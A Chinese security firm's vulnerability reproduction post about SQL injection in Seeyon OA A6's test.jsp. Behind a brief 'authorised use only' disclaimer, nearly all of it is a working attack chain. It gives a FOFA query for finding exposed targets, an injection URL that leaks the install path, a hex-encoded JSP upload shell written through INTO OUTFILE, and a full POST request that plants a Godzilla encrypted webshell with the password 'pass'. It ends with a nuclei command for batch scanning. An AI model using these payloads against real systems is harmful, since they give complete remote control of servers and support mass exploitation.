0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
致远OA办公自动化软件,用于OA办公自动化软件的开发销售。2010年,用友致远更名为致远协创。2017年更名为致远互联。北京致远互联软件股份有限公司(简称:致远互联)成立于2002年3月,总部设立在北京,是一家集协同办公产品的设计、研发、销售及服务为一体的企业。致远OA A6-m等业务系统test.jsp处存在SQL注入漏洞,攻击者通过漏洞可以写入网站木马,导致服务器失陷。
0x03 漏洞复现
fofa:app="致远互联-OA"
1.查路径
http://{{Hostname}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)
2.根据得到的路径拼接网站根目录默认路径/tomcat/webapps/yyoa/1_upload.jsp,写入第一个带上传功能的马1_upload.jsp,回包显示更新或已经存在即为上传成功
1.路径格式转换{{路径}} -> {{路径}}/tomcat/webapps/yyoa/1_upload.jsp2.例如此处的D:U8-OAmysqlbin.. 将mysql后面的都删除,拼接/tomcat......->D:/U8-OA/tomcat/webapps/yyoa/1_upload.jsp3.写入第一个上传功能的shellhttp://{{Hostname}}/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E%27)%20%20into%20outfile%20%27D:/U8-OA/tomcat/webapps/yyoa/111_upload.jsp%27
3.根据第一个上传功能马1_upload.jsp,写入第二个哥斯拉马hello_zhiyuanOA.jsp到根目录,这个无回显
POST /yyoa/1_upload.jsp?f=hello_zhiyuanOA.jsp HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 3495DNT: 1Connection: closeUpgrade-Insecure-Requests: 1t=%3C%25%21+String+xc%3D%223c6e0b8a9c15224a%22%3B+String+pass%3D%22pass%22%3B+String+md5%3Dmd5%28pass%2Bxc%29%3B+class+X+extends+ClassLoader%7Bpublic+X%28ClassLoader+z%29%7Bsuper%28z%29%3B%7Dpublic+Class+Q%28byte%5B%5D+cb%29%7Breturn+super.defineClass%28cb%2C+0%2C+cb.length%29%3B%7D+%7Dpublic+byte%5B%5D+x%28byte%5B%5D+s%2Cboolean+m%29%7B+try%7Bjavax.crypto.Cipher+c%3Djavax.crypto.Cipher.getInstance%28%22AES%22%29%3Bc.init%28m%3F1%3A2%2Cnew+javax.crypto.spec.SecretKeySpec%28xc.getBytes%28%29%2C%22AES%22%29%29%3Breturn+c.doFinal%28s%29%3B+%7Dcatch+%28Exception+e%29%7Breturn+null%3B+%7D%7D+public+static+String+md5%28String+s%29+%7BString+ret+%3D+null%3Btry+%7Bjava.security.MessageDigest+m%3Bm+%3D+java.security.MessageDigest.getInstance%28%22MD5%22%29%3Bm.update%28s.getBytes%28%29%2C+0%2C+s.length%28%29%29%3Bret+%3D+new+java.math.BigInteger%281%2C+m.digest%28%29%29.toString%2816%29.toUpperCase%28%29%3B%7D+catch+%28Exception+e%29+%7B%7Dreturn+ret%3B+%7D+public+static+String+base64Encode%28byte%5B%5D+bs%29+throws+Exception+%7BClass+base64%3BString+value+%3D+null%3Btry+%7Bbase64%3DClass.forName%28%22java.util.Base64%22%29%3BObject+Encoder+%3D+base64.getMethod%28%22getEncoder%22%2C+null%29.invoke%28base64%2C+null%29%3Bvalue+%3D+%28String%29Encoder.getClass%28%29.getMethod%28%22encodeToString%22%2C+new+Class%5B%5D+%7B+byte%5B%5D.class+%7D%29.invoke%28Encoder%2C+new+Object%5B%5D+%7B+bs+%7D%29%3B%7D+catch+%28Exception+e%29+%7Btry+%7B+base64%3DClass.forName%28%22sun.misc.BASE64Encoder%22%29%3B+Object+Encoder+%3D+base64.newInstance%28%29%3B+value+%3D+%28String%29Encoder.getClass%28%29.getMethod%28%22encode%22%2C+new+Class%5B%5D+%7B+byte%5B%5D.class+%7D%29.invoke%28Encoder%2C+new+Object%5B%5D+%7B+bs+%7D%29%3B%7D+catch+%28Exception+e2%29+%7B%7D%7Dreturn+value%3B+%7D+public+static+byte%5B%5D+base64Decode%28String+bs%29+throws+Exception+%7BClass+base64%3Bbyte%5B%5D+value+%3D+null%3Btry+%7Bbase64%3DClass.forName%28%22java.util.Base64%22%29%3BObject+decoder+%3D+base64.getMethod%28%22getDecoder%22%2C+null%29.invoke%28base64%2C+null%29%3Bvalue+%3D+%28byte%5B%5D%29decoder.getClass%28%29.getMethod%28%22decode%22%2C+new+Class%5B%5D+%7B+String.class+%7D%29.invoke%28decoder%2C+new+Object%5B%5D+%7B+bs+%7D%29%3B%7D+catch+%28Exception+e%29+%7Btry+%7B+base64%3DClass.forName%28%22sun.misc.BASE64Decoder%22%29%3B+Object+decoder+%3D+base64.newInstance%28%29%3B+value+%3D+%28byte%5B%5D%29decoder.getClass%28%29.getMethod%28%22decodeBuffer%22%2C+new+Class%5B%5D+%7B+String.class+%7D%29.invoke%28decoder%2C+new+Object%5B%5D+%7B+bs+%7D%29%3B%7D+catch+%28Exception+e2%29+%7B%7D%7Dreturn+value%3B+%7D%25%3E%3C%25try%7Bbyte%5B%5D+data%3Dbase64Decode%28request.getParameter%28pass%29%29%3Bdata%3Dx%28data%2C+false%29%3Bif+%28session.getAttribute%28%22payload%22%29%3D%3Dnull%29%7Bsession.setAttribute%28%22payload%22%2Cnew+X%28this.getClass%28%29.getClassLoader%28%29%29.Q%28data%29%29%3B%7Delse%7Brequest.setAttribute%28%22parameters%22%2Cdata%29%3Bjava.io.ByteArrayOutputStream+arrOut%3Dnew+java.io.ByteArrayOutputStream%28%29%3BObject+f%3D%28%28Class%29session.getAttribute%28%22payload%22%29%29.newInstance%28%29%3Bf.equals%28arrOut%29%3Bf.equals%28pageContext%29%3Bresponse.getWriter%28%29.write%28md5.substring%280%2C16%29%29%3Bf.toString%28%29%3Bresponse.getWriter%28%29.write%28base64Encode%28x%28arrOut.toByteArray%28%29%2C+true%29%29%29%3Bresponse.getWriter%28%29.write%28md5.substring%2816%29%29%3B%7D+%7Dcatch+%28Exception+e%29%7B%7D%3Bout.println%28%22hello+zhiyuanOA%22%29%3B%25%3E
4.哥斯拉连接成功
http://{{Hostname}}/yyoa/hello_zhiyuanOA.jsp密码:pass
5.nuclei批量验证脚本已发表于知识星球
nuclei.exe -t zhiyuanOA_test_SQL.yaml -l subs.txt -stat
0x04 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
1个
1朵
5毛钱
天天搬砖的小M
能不能吃顿好的
就看你们的啦
原文始发于微信公众号(融云攻防实验室):漏洞复现 致远OA A6 test.jsp SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论